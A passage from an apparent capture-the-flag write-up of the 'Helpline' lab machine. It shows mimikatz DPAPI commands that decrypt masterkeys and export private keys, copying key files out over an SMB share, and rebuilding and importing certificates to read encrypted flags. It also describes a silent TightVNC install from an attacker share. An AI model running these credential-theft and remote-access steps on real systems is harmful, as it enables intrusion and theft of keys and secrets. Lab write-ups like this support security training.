If I run the same command I ran earlier to get information on the private key, I’ll get more information now as mimikatz knows the masterkey:

mimikatz # dpapi::capi /in:"C:\Users\Administrator\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-500\d1775a874937ca4b3cd9b8e334588333_86f90bf3-9d4c-47b0-bc79-380521b14c85"
...[snip same as before]...

Decrypting AT_EXCHANGE Export flags:
 * volatile cache: GUID:{9e78687d-d881-4ccb-8bd8-bc0a19608687};KeyHash:b18974052cb509a86a008869fd95388550678184
Decrypting AT_EXCHANGE Private Key:
 * volatile cache: GUID:{9e78687d-d881-4ccb-8bd8-bc0a19608687};KeyHash:b18974052cb509a86a008869fd95388550678184
        Exportable key : YES
        Key size       : 2048
        Private export : OK - 'raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk'

And now the .pvk file exists in the local directory:

C:\>dir \windows\system32\spool\drivers\color\*.pvk /b

I’ll copy that file back:

C:\>net use \\\share /u:df df
The command completed successfully.

C:\>copy \windows\system32\spool\drivers\color\raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk \\\share\
        1 file(s) copied.
C:\>copy \windows\system32\spool\drivers\color\FB154575993A250FE826DBAC79EF26C211CB77B3.der \\\df\
        1 file(s) copied.

Build PFX

I’ll follow the instructions from the guide and create a .pfx file:

root@kali# openssl x509 -inform DER -outform PEM -in FB154575993A250FE826DBAC79EF26C211CB77B3.der -out root_public.pem
root@kali# openssl rsa -inform PVK -outform PEM -in raw_exchange_capi_0_3dd3e213-bce6-4acb-808c-a1b3227ecbde.pvk  -out root_private.pem
writing RSA key
root@kali# openssl pkcs12 -in root_public.pem -inkey root_private.pem -pass:0xdf -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out root_cert.pfx
pkcs12: Unrecognized flag pass:0xdf
pkcs12: Use -help for summary.
root@kali# openssl pkcs12 -in root_public.pem -inkey root_private.pem -password pass:0xdf -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out root_cert.pfx

Install PFX

Now I can copy that back to Helpline:

C:\>copy \\\share\root_cert.pfx \windows\system32\spool\drivers\color\
        1 file(s) copied.

And install it:

C:\>certutil -user -p 0xdf -importpfx \windows\system32\spool\drivers\color\root_cert.pfx NoChain,NoRoot
Certificate "Administrator" added to store.

CertUtil: -importPFX command completed successfully.

Access root.txt

Now I can get the flag:

C:\>type users\administrator\desktop\root.txt


I can do the same process for user.txt. I’ll see it on tolu’s desktop:

C:\Users\tolu\Desktop>dir /b

I’ve already got tolu’s has: 03e2ec7aa7e82e479be07ecd34f1603b.

I can use cipher to get the Certificate thumbprint: 91EF 5D08 D1F7 C60A A0E4 CEE7 3E05 0639 A669 2F29.

I can verify that Certificate exists:

C:\Users\tolu\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates>dir /a /b

And run:

crypto::system /file:"C:\Users\tolu\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\91EF5D08D1F7C60AA0E4CEE73E050639A6692F29" /export

to export it and get the Key Container ID of e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.

In C:\Users\tolu\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-1011, I find a single key container, 307da0c2172e73b4af3e45a97ef0755b_86f90bf3-9d4c-47b0-bc79-380521b14c85.

mimikatz command of:

dpapi::capi /in:"C:\Users\tolu\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3107372852-1132949149-763516304-1011\307da0c2172e73b4af3e45a97ef0755b_86f90bf3-9d4c-47b0-bc79-380521b14c85"

gives me a match on the pUniqueName, and gives me a masterkey of 2f452fc5-c6d2-4706-a4f7-1cd6b891c017.

I can decrypt that key with the command (I’ll use the plaintext password from the logs this time to show a different way):

dpapi::masterkey /in:"C:\Users\tolu\AppData\Roaming\Microsoft\Protect\S-1-5-21-3107372852-1132949149-763516304-1011\2f452fc5-c6d2-4706-a4f7-1cd6b891c017" /password:!zaq1234567890pl!99

I get a master password, which mimikatz now knows. I’ll run the dpapi::capi command again, and get raw_exchange_capi_0_e65e6804-f9cd-4a35-b3c9-c3a72a162e4d.pvk. Bring it and the cert back to kali, and create the .pfx. Move it back, and import:

C:\>certutil -user -p 0xdf -importpfx \windows\system32\spool\drivers\color\user_cert.pfx NoChain,NoRoot
certutil -user -p 0xdf -importpfx \windows\system32\spool\drivers\color\user_cert.pfx NoChain,NoRoot
Certificate "tolu" added to store.

CertUtil: -importPFX command completed successfully.

Now grab user.txt:

C:\>type users\tolu\desktop\user.txt


jrk figured out another really cool way to make reading the EFS files easier - install VNC. He tried to connect over RDP, but wasn’t blocked from doing so. But when I install VNC, I can then connect to it rather easily.

Install VNC

I’ll grab the latest x64 msi installer for TightVNC from their downloads page, and I’ll drop it into a folder I’m sharing with smbserver.py.

Now, from my SYSTEM shell, I’ll run the following monster command:


That tells Windows to run the .msi installer from my share using msiexec with options to start immediately, without a restart, opening the firewall, starting a service, and setting the control password to “PASSWORD”.

After running, it takes a minute for the port to open. But eventually it does:

root@kali# nmap -p 5900
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 15:44 EDT
Nmap scan report for
Host is up (0.031s latency).

5900/tcp filtered vnc

Nmap done: 1 IP address (1 host up) scanned in 0.55 seconds

root@kali# nmap -p 5900
Starting Nmap 7.70 ( https://nmap.org ) at 2019-08-14 15:44 EDT
Nmap scan report for
Host is up (0.030s latency).

5900/tcp open  vnc

Nmap done: 1 IP address (1 host up) scanned in 1.41 seconds


Now I’ll use the vncviewer application on kali to connect:

root@kali# vncviewer
Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
Performing standard VNC authentication
Authentication successful
Desktop name "helpline"
VNC server default format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor.  Pixel format:
  32 bits per pixel.
  Least significant byte first in each pixel.
  True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0

When prompted for a password, I’ll enter “PASSWORD”. I’m granted access to the desktop:


I’ll scroll down and open a cmd window. I’m running as leo:


I can’t exactly explain why I’m leo. I know the box must have leo’s creds because it is running the scheduled task as leo. But why does the VNC service install as leo? If you know, please leave a comment.


I can easily go to leo’s desktop, read admin-pass.xml and get the plain-text admin password. From there, I can start a terminal as administrator, and get root.txt:

root.txt via vncClick for full size image

I can get the creds for tolu from the event logs, and then create a cmd as that user as well:

user.txt via vncClick for full size image